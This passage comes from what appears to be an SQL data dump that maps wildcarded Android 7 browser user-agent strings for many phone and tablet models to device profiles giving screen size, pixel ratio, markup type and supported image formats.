(Linux; Android 7.*; U11_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U16 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U20_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U50A_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U7 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; U7 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ULTRA Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; UMI_MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; URANO 77LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ulefone S7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ulefone S8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ultra Shine) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ultra Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ultra Sync) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ultra Trend) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ultra_Vision_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V2_Viper_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V3_5580_Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V4 Nano) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V4+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; V8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 1300) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 513) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VFD 710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIA_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIA_A1_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIA_F2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIA_P2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIE-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIE-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIVAX Fun S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIVAX PRO M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VIVAX PRO2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VKY-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VKY-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX 4s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX E502 4G VS5036PL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX Flash 4G VS5015ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX S509 3G VS5032PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX STEEL Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VOX_S513_4G_VS5035ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS835) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS987) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VS995) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VTR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VTR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VZH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Venus E3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Venus V5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Venus_V3_5580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Venus_V4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vibe K5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vibe K5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; View Prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; View XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; View) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vision) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; VisionBook_P50Plus_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo 5 Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo 5R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo 8L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo One Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Vivo XL2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Volt) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Volt_S_A7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-L03T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-LX1A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; 